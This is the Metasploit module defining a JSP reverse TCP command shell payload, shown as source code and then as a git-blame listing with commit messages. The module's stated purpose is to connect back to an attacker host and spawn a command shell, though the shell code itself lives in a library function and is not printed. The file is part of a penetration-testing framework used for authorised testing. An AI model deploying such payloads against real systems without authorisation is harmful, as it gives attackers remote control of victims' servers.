metasploit-framework/modules/payloads/singles/java/jsp_shell_reverse_tcp.rb

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'
require 'msf/core/payload/jsp'
require 'msf/core/handler/reverse_tcp'
require 'msf/base/sessions/command_shell'
require 'msf/base/sessions/command_shell_options'

module Metasploit3

  CachedSize = 1501

  include Msf::Payload::Single
  include Msf::Payload::JSP
  include Msf::Sessions::CommandShellOptions

  def initialize(info = {})
    super(merge_info(info,
      'Name'          => 'Java JSP Command Shell, Reverse TCP Inline',
      'Description'   => 'Connect back to attacker and spawn a command shell',
      'Author'        => [ 'sf' ],
      'License'       => MSF_LICENSE,
      'Platform'      => %w{ linux osx solaris unix win },
      'Arch'          => ARCH_JAVA,
      'Handler'       => Msf::Handler::ReverseTcp,
      'Session'       => Msf::Sessions::CommandShell,
      'Payload'       =>
        {
          'Offsets' => { },
          'Payload' => ''
        }
      ))
  end


  def generate

    if( !datastore['LHOST'] or datastore['LHOST'].empty? )
      return super
    end

    return super + jsp_reverse_tcp
  end

end
crossing fingers, big cr removal batch git-svn-id: file:///home/svn/framework3/trunk@8038 4d416f70-5f16-0410-b530-b9f4589650da 2009-12-30 22:24:22 +00:00			`##`
Fix up comment splats with the correct URI See the complaint on #4039. This doesn't fix that particular issue (it's somewhat unrelated), but does solve around a file parsing problem reported by @void-in 2014-10-17 16:47:33 +00:00			`# This module requires Metasploit: http://metasploit.com/download`
Catch mis-formatted bracket comments. 2013-10-15 19:52:12 +00:00			`# Current source: https://github.com/rapid7/metasploit-framework`
crossing fingers, big cr removal batch git-svn-id: file:///home/svn/framework3/trunk@8038 4d416f70-5f16-0410-b530-b9f4589650da 2009-12-30 22:24:22 +00:00			`##`

			`require 'msf/core'`
Move the require to the payloads as ruby and nodejs payloads do 2014-01-02 22:05:03 +00:00			`require 'msf/core/payload/jsp'`
crossing fingers, big cr removal batch git-svn-id: file:///home/svn/framework3/trunk@8038 4d416f70-5f16-0410-b530-b9f4589650da 2009-12-30 22:24:22 +00:00			`require 'msf/core/handler/reverse_tcp'`
			`require 'msf/base/sessions/command_shell'`
adds scripting for command shell sessions 1. InitialAutoRunScript and AutoRunScript vars work 2. scripts/shells was created to hold them 3. _shell methods were renamed shell_ 4. added "shell_command" method to command shell sessions 5. converted all uses of _shell to shell_ 6. all payloads that produce command shell sessions include Msf::Sessions::CommandShellOptions git-svn-id: file:///home/svn/framework3/trunk@8615 4d416f70-5f16-0410-b530-b9f4589650da 2010-02-24 01:19:59 +00:00			`require 'msf/base/sessions/command_shell_options'`
crossing fingers, big cr removal batch git-svn-id: file:///home/svn/framework3/trunk@8038 4d416f70-5f16-0410-b530-b9f4589650da 2009-12-30 22:24:22 +00:00
			`module Metasploit3`

Instantiate payload modules so parameter validation occurs Calling .new on payload modules does not perform parameter validation, leading to a number cached sizes based on invalid parameters. Most notably, normalization does not occur either, which makes all OptBool params default to true. 2015-08-13 16:10:50 +00:00			`CachedSize = 1501`
The result of running ./tools/update_payload_cached_sizes.rb 2015-03-09 20:31:04 +00:00
Retab modules 2013-08-30 21:28:54 +00:00			`include Msf::Payload::Single`
Refactor JSP payloads 2013-12-31 14:27:37 +00:00			`include Msf::Payload::JSP`
Retab modules 2013-08-30 21:28:54 +00:00			`include Msf::Sessions::CommandShellOptions`

			`def initialize(info = {})`
			`super(merge_info(info,`
			`'Name' => 'Java JSP Command Shell, Reverse TCP Inline',`
			`'Description' => 'Connect back to attacker and spawn a command shell',`
			`'Author' => [ 'sf' ],`
			`'License' => MSF_LICENSE,`
Prefer Ruby style for single word collections According to the Ruby style guide, %w{} collections for arrays of single words are preferred. They're easier to type, and if you want a quick grep, they're easier to search. This change converts all Payloads to this format if there is more than one payload to choose from. It also alphabetizes the payloads, so the order can be more predictable, and for long sets, easier to scan with eyeballs. See: https://github.com/bbatsov/ruby-style-guide#collections 2013-09-24 17:33:31 +00:00			`'Platform' => %w{ linux osx solaris unix win },`
Retab modules 2013-08-30 21:28:54 +00:00			`'Arch' => ARCH_JAVA,`
			`'Handler' => Msf::Handler::ReverseTcp,`
			`'Session' => Msf::Sessions::CommandShell,`
			`'Payload' =>`
			`{`
			`'Offsets' => { },`
			`'Payload' => ''`
			`}`
			`))`
			`end`


			`def generate`

			`if( !datastore['LHOST'] or datastore['LHOST'].empty? )`
			`return super`
			`end`

Refactor JSP payloads 2013-12-31 14:27:37 +00:00			`return super + jsp_reverse_tcp`
Add generate_war to jsp_shell payloads 2013-12-30 19:53:58 +00:00			`end`

crossing fingers, big cr removal batch git-svn-id: file:///home/svn/framework3/trunk@8038 4d416f70-5f16-0410-b530-b9f4589650da 2009-12-30 22:24:22 +00:00			`end`